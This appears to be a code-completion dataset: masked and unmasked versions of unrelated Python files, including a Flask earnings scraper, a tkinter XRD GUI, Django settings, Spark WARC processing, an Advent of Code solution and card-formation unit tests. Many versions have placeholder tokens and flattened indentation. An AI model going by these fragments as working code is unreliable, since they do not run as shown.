from recent_earnings_tickers import ok_tickers
import re
<mask token>
app = flask.Flask(__name__)
@app.route('/')
def home_page():
with open('/Users/samfunk/ds/metis/project_mcnulty/stock_page.html', 'r'
) as viz_file:
return viz_file.read()
@app.route('/stock', methods=['POST'])
def stock(ok_tickers=ok_tickers()):
data = flask.request.json
ticker = str(data['ticker']).upper()
if ticker in ok_tickers:
earnings_soup = BeautifulSoup(requests.get(
'https://finance.yahoo.com/quote/%s/analysts?p=%s' % (ticker,
ticker)).text, 'html.parser')
surprise_string = earnings_soup.find_all('table')[2].tbody.find_all(
'tr')[3].find_all('td')[4].text
surprise = float(re.search('(.*)%', surprise_string)[1])
if abs(surprise) < 5.0:
score = 0
else:
score = 1
else:
surprise_string = 'null'
score = 'null'
results = {'surprise': surprise_string, 'score': score}
print(ticker, results)
return flask.jsonify(results)
if __name__ == '__main__':
app.run()
| import flask
import numpy as np
import pandas as pd
import requests
from bs4 import BeautifulSoup
import pickle
from recent_earnings_tickers import ok_tickers
import re
#---------- Model ----------------#
#with open('/Users/samfunk/ds/metis/project_mcnulty/code/REPLACE_WITH_MODEL_PICKLE', 'rb') as f:
#PREDICTOR = pickle.load(f)
'''Have final model in the pickle file
Should be prefit to main data
Simply ask for a company/list of companies
Input the ticker into model (which will scrape web for current features)
Pray some of them are right'''
#---------- URLS AND WEB PAGES -------------#
app = flask.Flask(__name__)
@app.route('/')
def home_page():
with open("/Users/samfunk/ds/metis/project_mcnulty/stock_page.html",'r') as viz_file:
return viz_file.read()
@app.route("/stock", methods=["POST"])
def stock(ok_tickers=ok_tickers()):
data = flask.request.json
ticker = str(data["ticker"]).upper()
if ticker in ok_tickers:
earnings_soup = BeautifulSoup(requests.get("https://finance.yahoo.com/quote/%s/analysts?p=%s" % (ticker, ticker)).text, 'html.parser')
surprise_string = earnings_soup.find_all('table')[2].tbody.find_all('tr')[3].find_all('td')[4].text
surprise = float(re.search(r'(.*)%', surprise_string)[1])
#score = PREDICTOR.predict_proba(x)
if abs(surprise) < 5.0:
score = 0
else:
score = 1
else:
surprise_string = 'null'
score = 'null'
#score = PREDICTOR.predict_proba(x)
results = {"surprise": surprise_string, "score": score}
print(ticker, results)
return flask.jsonify(results)
if __name__ == '__main__':
app.run()
| [
1,
3,
4,
5,
6
] |
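# --- Added example (not part of the dataset row above) ---
# Isolated check (toy strings) of the surprise-parsing step used in /stock:
# re.search(r'(.*)%', s) captures everything before the percent sign.
import re

for s in ['4.20%', '-12.5%']:
    print(float(re.search(r'(.*)%', s)[1]))  # 4.2, then -12.5
# Yahoo shows '-' when no estimate exists; re.search returns None there, so
# production code would need a guard before indexing the match object.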
1,642 | 137ed9c36265781dbebabbd1ee0ea84c9850201a | <mask token>
class mainwin:
def __init__(self, master):
self.master = master
master.title
master.title('University of Utah XRD Analysis Multi-tool')
self.tab_parent = ttk.Notebook(master)
self.tab1 = ttk.Frame(self.tab_parent)
self.tab2 = ttk.Frame(self.tab_parent)
self.tab3 = ttk.Frame(self.tab_parent)
self.tab_parent.add(self.tab1, text='Crystallization Peak Fit')
self.tab_parent.add(self.tab2, text='Small Angle Simulation')
self.tab_parent.grid(row=1, column=0)
tk.Label(self.master, text='').grid(row=2, column=3)
cp.tab(self.tab1)
sa.tab(self.tab2)
<mask token>
| <mask token>
matplotlib.use('TkAgg')
class mainwin:
def __init__(self, master):
self.master = master
master.title
master.title('University of Utah XRD Analysis Multi-tool')
self.tab_parent = ttk.Notebook(master)
self.tab1 = ttk.Frame(self.tab_parent)
self.tab2 = ttk.Frame(self.tab_parent)
self.tab3 = ttk.Frame(self.tab_parent)
self.tab_parent.add(self.tab1, text='Crystallization Peak Fit')
self.tab_parent.add(self.tab2, text='Small Angle Simulation')
self.tab_parent.grid(row=1, column=0)
tk.Label(self.master, text='').grid(row=2, column=3)
cp.tab(self.tab1)
sa.tab(self.tab2)
<mask token>
root.mainloop()
| <mask token>
matplotlib.use('TkAgg')
class mainwin:
def __init__(self, master):
self.master = master
master.title
master.title('University of Utah XRD Analysis Multi-tool')
self.tab_parent = ttk.Notebook(master)
self.tab1 = ttk.Frame(self.tab_parent)
self.tab2 = ttk.Frame(self.tab_parent)
self.tab3 = ttk.Frame(self.tab_parent)
self.tab_parent.add(self.tab1, text='Crystallization Peak Fit')
self.tab_parent.add(self.tab2, text='Small Angle Simulation')
self.tab_parent.grid(row=1, column=0)
tk.Label(self.master, text='').grid(row=2, column=3)
cp.tab(self.tab1)
sa.tab(self.tab2)
root = tk.Tk()
my_gui = mainwin(root)
root.mainloop()
| import tkinter as tk
from tkinter import Tk, ttk
from tkinter import filedialog
import matplotlib.pyplot as plt
import numpy as np
import matplotlib
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2Tk
from matplotlib.figure import Figure
import matplotlib.animation as animation
from matplotlib import style
import crystalpeaktab as cp
import smallangletab as sa
matplotlib.use('TkAgg')
class mainwin:
def __init__(self, master):
self.master = master
master.title
master.title('University of Utah XRD Analysis Multi-tool')
self.tab_parent = ttk.Notebook(master)
self.tab1 = ttk.Frame(self.tab_parent)
self.tab2 = ttk.Frame(self.tab_parent)
self.tab3 = ttk.Frame(self.tab_parent)
self.tab_parent.add(self.tab1, text='Crystallization Peak Fit')
self.tab_parent.add(self.tab2, text='Small Angle Simulation')
self.tab_parent.grid(row=1, column=0)
tk.Label(self.master, text='').grid(row=2, column=3)
cp.tab(self.tab1)
sa.tab(self.tab2)
root = tk.Tk()
my_gui = mainwin(root)
root.mainloop()
| import tkinter as tk
from tkinter import Tk, ttk
from tkinter import filedialog
import matplotlib.pyplot as plt
import numpy as np
import matplotlib
from matplotlib.backends.backend_tkagg import (
FigureCanvasTkAgg, NavigationToolbar2Tk)
from matplotlib.figure import Figure
import matplotlib.animation as animation
from matplotlib import style
import crystalpeaktab as cp
import smallangletab as sa
matplotlib.use("TkAgg")
class mainwin:
def __init__(self, master):
self.master = master
master.title
master.title("University of Utah XRD Analysis Multi-tool")
#Sets up tabs
self.tab_parent = ttk.Notebook(master)
self.tab1 = ttk.Frame(self.tab_parent)
self.tab2 = ttk.Frame(self.tab_parent)
self.tab3 = ttk.Frame(self.tab_parent)
self.tab_parent.add(self.tab1, text="Crystallization Peak Fit")
self.tab_parent.add(self.tab2, text="Small Angle Simulation")
self.tab_parent.grid(row=1, column=0)
# Spacers
tk.Label(self.master, text="").grid(row=2, column=3)
# Sets the first tab to be the crystal peak analysis
cp.tab(self.tab1)
# Sets the second tab to be the Small Angle Analytic Simulation
sa.tab(self.tab2)
# ======================================================================================================================
# ======================================================================================================================
# MAIN MAIN MAIN MAIN MAIN MAIN MAIN MAIN MAIN MAIN MAIN MAIN MAIN MAIN MAIN MAIN MAIN MAIN MAIN MAIN
# ======================================================================================================================
root = tk.Tk()
my_gui = mainwin(root)
root.mainloop()
# ======================================================================================================================
# ======================================================================================================================
| [
2,
3,
4,
5,
6
] |
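# --- Added example (not part of the dataset row above) ---
# Hedged sketch of the module interface the app assumes: crystalpeaktab and
# smallangletab each expose a tab(parent) function that populates a ttk.Frame.
# The body below is illustrative only; the real modules are not in this record.
import tkinter as tk

def tab(parent):
    tk.Label(parent, text='placeholder content').grid(row=0, column=0)
    # the real modules would build plots, entry fields and buttons here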
1,643 | ab35684166f07a3ab9e64f2ff98980e25a3fc576 | <mask token>
| <mask token>
DEBUG = True
SECRET_KEY = os.environ['SECRET_KEY']
ROOT_URLCONF = 'floweryroad.urls.docker_production'
ALLOWED_HOSTS = [os.environ['WEB_HOST']]
CORS_ORIGIN_WHITELIST = [os.environ['CORS']]
DATABASES = {'default': {'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': os.environ['DB_NAME'], 'USER': os.environ['DB_USER'],
'PASSWORD': os.environ['DB_PASSWORD'], 'HOST': os.environ['DB_HOST'],
'PORT': os.environ['DB_PORT']}}
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
MEDIA_URL = os.environ['MEDIA']
| from django.conf import settings
from .base import *
import os
DEBUG = True
SECRET_KEY = os.environ['SECRET_KEY']
ROOT_URLCONF = 'floweryroad.urls.docker_production'
ALLOWED_HOSTS = [os.environ['WEB_HOST']]
CORS_ORIGIN_WHITELIST = [os.environ['CORS']]
DATABASES = {'default': {'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': os.environ['DB_NAME'], 'USER': os.environ['DB_USER'],
'PASSWORD': os.environ['DB_PASSWORD'], 'HOST': os.environ['DB_HOST'],
'PORT': os.environ['DB_PORT']}}
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
MEDIA_URL = os.environ['MEDIA']
| null | null | [
0,
1,
2
] |
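# --- Added example (not part of the dataset row above) ---
# Sketch of a fail-fast variant of the os.environ pattern above; os.environ[x]
# already raises KeyError, but a helper names the missing variable explicitly.
# (Note: the record sets DEBUG = True in a production settings file, which is
# usually unintended.)
import os

def env(name, default=None):
    value = os.environ.get(name, default)
    if value is None:
        raise RuntimeError(f'required environment variable {name} is not set')
    return value

# e.g. SECRET_KEY = env('SECRET_KEY')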
1,644 | f13ccbfb27788deca0d4f4b58a4e9e8c7e8e0306 | <mask token>
class SideEnum(str, Enum):
BUY = 'B'
SELL = 'S'
class BaseClient:
def __init__(self, client: 'StakeClient'):
self._client = weakref.proxy(client)
| <mask token>
if TYPE_CHECKING:
from stake.client import StakeClient
<mask token>
class SideEnum(str, Enum):
BUY = 'B'
SELL = 'S'
class BaseClient:
def __init__(self, client: 'StakeClient'):
self._client = weakref.proxy(client)
| <mask token>
if TYPE_CHECKING:
from stake.client import StakeClient
camelcase = partial(inflection.camelize, uppercase_first_letter=False)
__all__ = ['SideEnum']
class SideEnum(str, Enum):
BUY = 'B'
SELL = 'S'
class BaseClient:
def __init__(self, client: 'StakeClient'):
self._client = weakref.proxy(client)
| import weakref
from enum import Enum
from functools import partial
from typing import TYPE_CHECKING
import inflection
if TYPE_CHECKING:
from stake.client import StakeClient
camelcase = partial(inflection.camelize, uppercase_first_letter=False)
__all__ = ['SideEnum']
class SideEnum(str, Enum):
BUY = 'B'
SELL = 'S'
class BaseClient:
def __init__(self, client: 'StakeClient'):
self._client = weakref.proxy(client)
| import weakref
from enum import Enum
from functools import partial
from typing import TYPE_CHECKING
import inflection
if TYPE_CHECKING:
from stake.client import StakeClient
camelcase = partial(inflection.camelize, uppercase_first_letter=False)
__all__ = ["SideEnum"]
class SideEnum(str, Enum):
BUY = "B"
SELL = "S"
class BaseClient:
# flake8: noqa
def __init__(self, client: "StakeClient"):
self._client = weakref.proxy(client)
| [
4,
5,
6,
7,
8
] |
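# --- Added example (not part of the dataset row above) ---
# Toy demo of why BaseClient stores weakref.proxy(client): the sub-client can
# call through to its parent without keeping it alive, avoiding a reference
# cycle between the parent client and its per-resource clients.
import weakref

class Parent:
    def ping(self):
        return 'pong'

class Child:
    def __init__(self, parent):
        self._parent = weakref.proxy(parent)

p = Parent()
c = Child(p)
print(c._parent.ping())  # 'pong' while the parent is alive
del p
# c._parent.ping() would now raise ReferenceError: the proxy does not keep
# the Parent instance alive.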
1,645 | bf41ab20b9fae9f19efdc58852e48d9b735f34c3 | <mask token>
| user_schema = {'id': {'type': 'string', 'required': True, 'coerce': (str,
lambda x: x.lower())}, 'latitude': {'type': 'float', 'required': True,
'min': -60.0, 'max': 10, 'coerce': (float, lambda x: round(x, 5))},
'longitude': {'type': 'float', 'required': True, 'min': -80.0, 'max': -
30.0, 'coerce': (float, lambda x: round(x, 5))}, 'radius': {'type':
'float', 'default': 10, 'max': 30.0, 'min': 0.1, 'coerce': (float, lambda
x: round(x, 1))}, 'variables': {'type': 'list', 'default': ['lightning',
'precipitation'], 'allowed': ['lightning', 'precipitation']}}
create_schema = {'payload': {'oneof': [{'type': 'list', 'schema': {'type':
'dict', 'schema': user_schema}}, {'type': 'dict', 'schema': user_schema}]}}
batch_create_schema = {'payload': {'type': 'list', 'schema': {'type':
'dict', 'schema': user_schema}}}
payload_schema = {'payload': {'type': 'dict', 'schema': user_schema}}
event_schema = {'pathParameters': {'type': 'dict', 'default': {}, 'schema':
{'uid': {'type': 'string', 'required': True}}}}
| user_schema = {
'id': {
'type': 'string',
'required': True,
'coerce': (str, lambda x: x.lower())
},
'latitude':{
'type': 'float',
'required': True,
'min': -60.0,
'max': 10,
'coerce': (float, lambda x: round(x, 5))
},
'longitude':{
'type': 'float',
'required': True,
'min': -80.0,
'max': -30.0,
'coerce': (float, lambda x: round(x, 5))
},
'radius':{
'type': 'float',
'default': 10,
'max': 30.0,
'min': 0.1,
'coerce': (float, lambda x: round(x, 1))
},
'variables':{
'type': 'list',
'default': ['lightning','precipitation'],
'allowed': [
'lightning',
'precipitation'
]
}
}
create_schema = {
'payload':{
'oneof':[
{
'type': 'list',
'schema':{
'type': 'dict',
'schema': user_schema
}
},
{
'type': 'dict',
'schema': user_schema
}
]
}
}
batch_create_schema = {
'payload':{
'type': 'list',
'schema':{
'type': 'dict',
'schema': user_schema
}
}
}
payload_schema = {
'payload':{
'type': 'dict',
'schema': user_schema
}
}
# Schema of AWS event
event_schema = {
'pathParameters':{
'type': 'dict',
'default': {},
'schema':{
'uid':{
'type': 'string',
'required': True,
},
}
}
} | null | null | [
0,
1,
2
] |
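# --- Added example (not part of the dataset row above) ---
# Usage sketch with the cerberus library, whose rule names this schema matches
# (type/required/coerce/default): validated() applies coercions and defaults
# and returns None when a bound is violated. The document below is invented.
from cerberus import Validator

v = Validator(user_schema)
doc = {'id': 'ABC', 'latitude': '-23.5505199', 'longitude': '-46.6333094'}
print(v.validated(doc))
# -> {'id': 'abc', 'latitude': -23.55052, 'longitude': -46.63331,
#     'radius': 10.0, 'variables': ['lightning', 'precipitation']}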
1,646 | fccdf75fe83ad8388c12a63555c4132181fd349a | <mask token>
def fall_asleep(record: WarcRecord):
current_uri: str = record.target_uri
start_time = str(datetime.now())
process_id = str(os.getpid())
print('@@1 falling asleep in process {} at {} processing {}'.format(
process_id, start_time, current_uri))
time.sleep(5)
end_time = str(datetime.now())
print('@@2 awakening in process {} at {} processing {}'.format(
process_id, end_time, current_uri))
return process_id, current_uri
<mask token>
def quick_print(processid_uri: (int, str)) ->(int, int):
new_process_id = str(os.getpid())
timepoint = str(datetime.now())
print('@@4 map2 in process {} at {} processing {}'.format(
new_process_id, timepoint, processid_uri[1]))
return processid_uri[0], new_process_id
<mask token>
| <mask token>
def fall_asleep(record: WarcRecord):
current_uri: str = record.target_uri
start_time = str(datetime.now())
process_id = str(os.getpid())
print('@@1 falling asleep in process {} at {} processing {}'.format(
process_id, start_time, current_uri))
time.sleep(5)
end_time = str(datetime.now())
print('@@2 awakening in process {} at {} processing {}'.format(
process_id, end_time, current_uri))
return process_id, current_uri
def trivial_filter(processid_uri: (int, str)) ->bool:
new_process_id = str(os.getpid())
timepoint = str(datetime.now())
print('@@3 filter in process {} at {} processing {}'.format(
new_process_id, timepoint, processid_uri[1]))
return True
def quick_print(processid_uri: (int, str)) ->(int, int):
new_process_id = str(os.getpid())
timepoint = str(datetime.now())
print('@@4 map2 in process {} at {} processing {}'.format(
new_process_id, timepoint, processid_uri[1]))
return processid_uri[0], new_process_id
<mask token>
| <mask token>
def fall_asleep(record: WarcRecord):
current_uri: str = record.target_uri
start_time = str(datetime.now())
process_id = str(os.getpid())
print('@@1 falling asleep in process {} at {} processing {}'.format(
process_id, start_time, current_uri))
time.sleep(5)
end_time = str(datetime.now())
print('@@2 awakening in process {} at {} processing {}'.format(
process_id, end_time, current_uri))
return process_id, current_uri
def trivial_filter(processid_uri: (int, str)) ->bool:
new_process_id = str(os.getpid())
timepoint = str(datetime.now())
print('@@3 filter in process {} at {} processing {}'.format(
new_process_id, timepoint, processid_uri[1]))
return True
def quick_print(processid_uri: (int, str)) ->(int, int):
new_process_id = str(os.getpid())
timepoint = str(datetime.now())
print('@@4 map2 in process {} at {} processing {}'.format(
new_process_id, timepoint, processid_uri[1]))
return processid_uri[0], new_process_id
if __name__ == '__main__':
session: SparkSession = create_session(3, 'Wave exploration')
input_warc = (
'/Users/a/Desktop/Buch/CC-MAIN-20191013195541-20191013222541-00000.warc'
)
raw_records = extract_raw_records(input_warc, session)
warc_records = raw_records.flatMap(parse_raw_warc)
process_ids_rdd = warc_records.map(fall_asleep).filter(trivial_filter).map(
quick_print)
distinct_process_ids: List[Tuple[int, int]] = process_ids_rdd.distinct(
).collect()
print(distinct_process_ids)
| import os
import time
from datetime import datetime
from typing import List, Tuple
from pyspark.sql import SparkSession
from Chapter01.utilities01_py.helper_python import create_session
from Chapter02.utilities02_py.domain_objects import WarcRecord
from Chapter02.utilities02_py.helper_python import extract_raw_records, parse_raw_warc
def fall_asleep(record: WarcRecord):
current_uri: str = record.target_uri
start_time = str(datetime.now())
process_id = str(os.getpid())
print('@@1 falling asleep in process {} at {} processing {}'.format(
process_id, start_time, current_uri))
time.sleep(5)
end_time = str(datetime.now())
print('@@2 awakening in process {} at {} processing {}'.format(
process_id, end_time, current_uri))
return process_id, current_uri
def trivial_filter(processid_uri: (int, str)) ->bool:
new_process_id = str(os.getpid())
timepoint = str(datetime.now())
print('@@3 filter in process {} at {} processing {}'.format(
new_process_id, timepoint, processid_uri[1]))
return True
def quick_print(processid_uri: (int, str)) ->(int, int):
new_process_id = str(os.getpid())
timepoint = str(datetime.now())
print('@@4 map2 in process {} at {} processing {}'.format(
new_process_id, timepoint, processid_uri[1]))
return processid_uri[0], new_process_id
if __name__ == '__main__':
session: SparkSession = create_session(3, 'Wave exploration')
input_warc = (
'/Users/a/Desktop/Buch/CC-MAIN-20191013195541-20191013222541-00000.warc'
)
raw_records = extract_raw_records(input_warc, session)
warc_records = raw_records.flatMap(parse_raw_warc)
process_ids_rdd = warc_records.map(fall_asleep).filter(trivial_filter).map(
quick_print)
distinct_process_ids: List[Tuple[int, int]] = process_ids_rdd.distinct(
).collect()
print(distinct_process_ids)
| import os
import time
from datetime import datetime
from typing import List, Tuple
from pyspark.sql import SparkSession
from Chapter01.utilities01_py.helper_python import create_session
from Chapter02.utilities02_py.domain_objects import WarcRecord
from Chapter02.utilities02_py.helper_python import extract_raw_records, parse_raw_warc
def fall_asleep(record: WarcRecord):
current_uri: str = record.target_uri
start_time = str(datetime.now())
process_id = str(os.getpid())
print('@@1 falling asleep in process {} at {} processing {}'.format(process_id, start_time, current_uri))
time.sleep(5)
end_time = str(datetime.now())
print('@@2 awakening in process {} at {} processing {}'.format(process_id, end_time, current_uri))
return process_id, current_uri
def trivial_filter(processid_uri: (int, str)) -> bool:
new_process_id = str(os.getpid())
timepoint = str(datetime.now())
print('@@3 filter in process {} at {} processing {}'.format(new_process_id, timepoint, processid_uri[1]))
return True
def quick_print(processid_uri: (int, str)) -> (int, int):
new_process_id = str(os.getpid())
timepoint = str(datetime.now())
print('@@4 map2 in process {} at {} processing {}'.format(new_process_id, timepoint, processid_uri[1]))
return processid_uri[0], new_process_id
if __name__ == "__main__":
session: SparkSession = create_session(3, "Wave exploration")
input_warc = "/Users/a/Desktop/Buch/CC-MAIN-20191013195541-20191013222541-00000.warc" # ToDo: Change path
raw_records = extract_raw_records(input_warc, session)
warc_records = raw_records \
.flatMap(parse_raw_warc)
process_ids_rdd = warc_records\
.map(fall_asleep)\
.filter(trivial_filter)\
.map(quick_print)
distinct_process_ids: List[Tuple[int, int]] = process_ids_rdd.distinct().collect()
print(distinct_process_ids)
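    # (editor's note) The narrow transformations map -> filter -> map are
    # pipelined inside one Python worker per partition, so tags @@1-@@4 should
    # report the same pid for a given record; distinct() then forces a shuffle.
    # Collecting the (pid_before, pid_after) pairs makes that visible.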
| [
2,
3,
4,
5,
6
] |
1,647 | 27f001f4e79291825c56642693894375fef3e66a | <mask token>
def read_input():
with open('../input/day12.txt') as f:
lines = f.readlines()
m = re.search('initial state:\\s([\\.#]+)', lines[0])
initial_state = m.groups()[0]
prog = re.compile('([\\.#]{5})\\s=>\\s([\\.#])')
rules = []
for i in range(2, len(lines)):
m = prog.search(lines[i])
groups = m.groups()
if groups[1] == '#':
rules.append((groups[0], groups[1]))
return initial_state, rules
def apply_gen(initial_state, rules, start):
next_state = []
initial_state = '....' + initial_state.strip('.') + '....'
set_start_idx = False
i = 2
while i <= len(initial_state) - 3:
curr_str = initial_state[i - 2:i + 3]
rule_matches = None
for r in rules:
if curr_str == r[0]:
rule_matches = r
break
if rule_matches:
if not set_start_idx:
start_idx = i - 4
set_start_idx = True
next_state.append(rule_matches[1])
else:
next_state.append('.')
i += 1
return start + start_idx, ''.join(next_state).strip('.')
def sum_plants(state, start):
i = start
plant_count = 0
for c in state:
if c == '#':
plant_count += i
i += 1
return plant_count
<mask token>
| <mask token>
def read_input():
with open('../input/day12.txt') as f:
lines = f.readlines()
m = re.search('initial state:\\s([\\.#]+)', lines[0])
initial_state = m.groups()[0]
prog = re.compile('([\\.#]{5})\\s=>\\s([\\.#])')
rules = []
for i in range(2, len(lines)):
m = prog.search(lines[i])
groups = m.groups()
if groups[1] == '#':
rules.append((groups[0], groups[1]))
return initial_state, rules
def apply_gen(initial_state, rules, start):
next_state = []
initial_state = '....' + initial_state.strip('.') + '....'
set_start_idx = False
i = 2
while i <= len(initial_state) - 3:
curr_str = initial_state[i - 2:i + 3]
rule_matches = None
for r in rules:
if curr_str == r[0]:
rule_matches = r
break
if rule_matches:
if not set_start_idx:
start_idx = i - 4
set_start_idx = True
next_state.append(rule_matches[1])
else:
next_state.append('.')
i += 1
return start + start_idx, ''.join(next_state).strip('.')
def sum_plants(state, start):
i = start
plant_count = 0
for c in state:
if c == '#':
plant_count += i
i += 1
return plant_count
<mask token>
for c in state:
if c == '#':
break
start += 1
<mask token>
while gen < 1000:
start, state = apply_gen(state, rules, start)
total = sum_plants(state, start)
diff = total - previos
gen += 1
if diff == prev_diff:
same_diff_count += 1
if same_diff_count == 100:
break
previos = total
prev_diff = diff
<mask token>
print(solution)
| <mask token>
def read_input():
with open('../input/day12.txt') as f:
lines = f.readlines()
m = re.search('initial state:\\s([\\.#]+)', lines[0])
initial_state = m.groups()[0]
prog = re.compile('([\\.#]{5})\\s=>\\s([\\.#])')
rules = []
for i in range(2, len(lines)):
m = prog.search(lines[i])
groups = m.groups()
if groups[1] == '#':
rules.append((groups[0], groups[1]))
return initial_state, rules
def apply_gen(initial_state, rules, start):
next_state = []
initial_state = '....' + initial_state.strip('.') + '....'
set_start_idx = False
i = 2
while i <= len(initial_state) - 3:
curr_str = initial_state[i - 2:i + 3]
rule_matches = None
for r in rules:
if curr_str == r[0]:
rule_matches = r
break
if rule_matches:
if not set_start_idx:
start_idx = i - 4
set_start_idx = True
next_state.append(rule_matches[1])
else:
next_state.append('.')
i += 1
return start + start_idx, ''.join(next_state).strip('.')
def sum_plants(state, start):
i = start
plant_count = 0
for c in state:
if c == '#':
plant_count += i
i += 1
return plant_count
state, rules = read_input()
start = 0
for c in state:
if c == '#':
break
start += 1
gen = 0
start_idx = -2
previos = sum_plants(state, start)
prev_diff = 0
same_diff_count = 0
while gen < 1000:
start, state = apply_gen(state, rules, start)
total = sum_plants(state, start)
diff = total - previos
gen += 1
if diff == prev_diff:
same_diff_count += 1
if same_diff_count == 100:
break
previos = total
prev_diff = diff
b = total - diff * gen
solution = diff * 50000000000 + b
print(solution)
| import re
def read_input():
with open('../input/day12.txt') as f:
lines = f.readlines()
m = re.search('initial state:\\s([\\.#]+)', lines[0])
initial_state = m.groups()[0]
prog = re.compile('([\\.#]{5})\\s=>\\s([\\.#])')
rules = []
for i in range(2, len(lines)):
m = prog.search(lines[i])
groups = m.groups()
if groups[1] == '#':
rules.append((groups[0], groups[1]))
return initial_state, rules
def apply_gen(initial_state, rules, start):
next_state = []
initial_state = '....' + initial_state.strip('.') + '....'
set_start_idx = False
i = 2
while i <= len(initial_state) - 3:
curr_str = initial_state[i - 2:i + 3]
rule_matches = None
for r in rules:
if curr_str == r[0]:
rule_matches = r
break
if rule_matches:
if not set_start_idx:
start_idx = i - 4
set_start_idx = True
next_state.append(rule_matches[1])
else:
next_state.append('.')
i += 1
return start + start_idx, ''.join(next_state).strip('.')
def sum_plants(state, start):
i = start
plant_count = 0
for c in state:
if c == '#':
plant_count += i
i += 1
return plant_count
state, rules = read_input()
start = 0
for c in state:
if c == '#':
break
start += 1
gen = 0
start_idx = -2
previos = sum_plants(state, start)
prev_diff = 0
same_diff_count = 0
while gen < 1000:
start, state = apply_gen(state, rules, start)
total = sum_plants(state, start)
diff = total - previos
gen += 1
if diff == prev_diff:
same_diff_count += 1
if same_diff_count == 100:
break
previos = total
prev_diff = diff
b = total - diff * gen
solution = diff * 50000000000 + b
print(solution)
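# (editor's note) Worked reasoning behind the shortcut: once the score delta per
# generation stabilizes, total(g) is linear, total(g) = diff * g + b with
# b = total - diff * gen, so generation 50_000_000_000 is extrapolated rather
# than simulated.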
| import re
def read_input():
with open('../input/day12.txt') as f:
lines = f.readlines()
m = re.search(r'initial state:\s([\.#]+)', lines[0])
initial_state = m.groups()[0]
prog = re.compile(r'([\.#]{5})\s=>\s([\.#])')
rules = []
for i in range(2, len(lines)):
m = prog.search(lines[i])
groups = m.groups()
if groups[1] == '#':
rules.append((groups[0], groups[1]))
return initial_state, rules
def apply_gen(initial_state, rules, start):
next_state = []
initial_state = '....' + initial_state.strip('.') + '....'
set_start_idx = False
i = 2
while i <= len(initial_state)-3:
curr_str = initial_state[i-2:i+3]
rule_matches = None
for r in rules:
if curr_str == r[0]:
rule_matches = r
break
if rule_matches:
if not set_start_idx:
start_idx = i - 4
set_start_idx = True
next_state.append(rule_matches[1])
else:
next_state.append('.')
i += 1
return start + start_idx, ''.join(next_state).strip('.')
def sum_plants(state, start):
i = start
plant_count = 0
for c in state:
if c == '#':
plant_count += i
i += 1
return plant_count
state, rules = read_input()
start = 0
for c in state:
if c == '#':
break
start += 1
gen = 0
start_idx = -2
previos = sum_plants(state, start)
prev_diff = 0
same_diff_count = 0
while gen < 1000:
start, state = apply_gen(state, rules, start)
total = sum_plants(state, start)
diff = total-previos
gen += 1
if diff == prev_diff:
same_diff_count += 1
if same_diff_count == 100:
break
previos = total
prev_diff = diff
b = total - diff*gen
solution = diff * 50000000000 + b
print(solution) | [
3,
4,
5,
6,
7
] |
1,648 | 0ce69b7ce99b9c01892c240d5b268a9510af4503 | <mask token>
class TestFormation(unittest.TestCase):
<mask token>
def test_formation_with_more_than_three_cards_is_considered_invalid(self):
self.assertRaisesRegexp(FormationInvalidError,
'Formation must have 3 cards', Formation, [(1, 'R'), (2, 'Y'),
(3, 'R'), (5, 'G')])
def test_can_get_formation_numbers_in_sorted_fashion(self):
formation = Formation([(1, 'R'), (3, 'Y'), (2, 'R')])
self.assertEquals((1, 2, 3), formation.get_numbers())
formation = Formation([(10, 'R'), (9, 'Y'), (8, 'R')])
self.assertEquals((8, 9, 10), formation.get_numbers())
<mask token>
<mask token>
def test_formation_equality_with_self(self):
self.assertTrue(Formation([(1, 'R'), (2, 'R'), (3, 'R')]).
is_equivalent_in_strength(Formation([(1, 'R'), (2, 'R'), (3,
'R')])))
def test_formation_equality_with_wedge_and_host(self):
self.assertFalse(Formation([(1, 'R'), (2, 'R'), (3, 'R')]).
is_equivalent_in_strength(Formation([(1, 'B'), (2, 'B'), (4,
'G')])))
self.assertFalse(Formation([(5, 'R'), (1, 'R'), (3, 'Y')]).
is_equivalent_in_strength(Formation([(2, 'B'), (3, 'B'), (4,
'B')])))
def test_formation_equality_with_two_wedges(self):
self.assertTrue(Formation([(1, 'R'), (2, 'R'), (3, 'R')]).
is_equivalent_in_strength(Formation([(1, 'G'), (2, 'G'), (3,
'G')])))
<mask token>
def test_formation_equality_with_wedge_and_skirmish(self):
self.assertFalse(Formation([(1, 'R'), (2, 'R'), (3, 'R')]).
is_equivalent_in_strength(Formation([(1, 'G'), (2, 'G'), (3,
'B')])))
def test_formation_equality_with_two_phalanxes(self):
self.assertTrue(Formation([(1, 'R'), (1, 'G'), (1, 'Y')]).
is_equivalent_in_strength(Formation([(1, 'P'), (1, 'B'), (1,
'O')])))
self.assertFalse(Formation([(1, 'R'), (1, 'G'), (1, 'Y')]).
is_equivalent_in_strength(Formation([(2, 'P'), (2, 'B'), (2,
'O')])))
def test_formation_equality_with_two_battalions(self):
self.assertTrue(Formation([(3, 'R'), (2, 'R'), (5, 'R')]).
is_equivalent_in_strength(Formation([(5, 'B'), (2, 'B'), (3,
'B')])))
self.assertFalse(Formation([(6, 'R'), (2, 'R'), (3, 'R')]).
is_equivalent_in_strength(Formation([(5, 'B'), (2, 'B'), (3,
'B')])))
def test_formation_equality_with_two_skirmishes(self):
self.assertTrue(Formation([(1, 'R'), (2, 'R'), (3, 'Y')]).
is_equivalent_in_strength(Formation([(1, 'B'), (2, 'B'), (3,
'G')])))
self.assertFalse(Formation([(1, 'R'), (2, 'R'), (3, 'Y')]).
is_equivalent_in_strength(Formation([(4, 'B'), (2, 'B'), (3,
'G')])))
def test_formation_equality_with_two_hosts(self):
self.assertTrue(Formation([(1, 'R'), (4, 'Y'), (3, 'R')]).
is_equivalent_in_strength(Formation([(1, 'G'), (4, 'G'), (3,
'B')])))
self.assertFalse(Formation([(1, 'R'), (2, 'Y'), (3, 'R')]).
is_equivalent_in_strength(Formation([(4, 'G'), (2, 'G'), (3,
'B')])))
def test_greater_than_check_two_wedges(self):
self.assertTrue(Formation([(4, 'R'), (2, 'R'), (3, 'R')]).
is_greater_strength_than(Formation([(1, 'R'), (2, 'R'), (3, 'R')]))
)
self.assertFalse(Formation([(1, 'R'), (2, 'R'), (3, 'R')]).
is_greater_strength_than(Formation([(1, 'R'), (2, 'R'), (3, 'R')]))
)
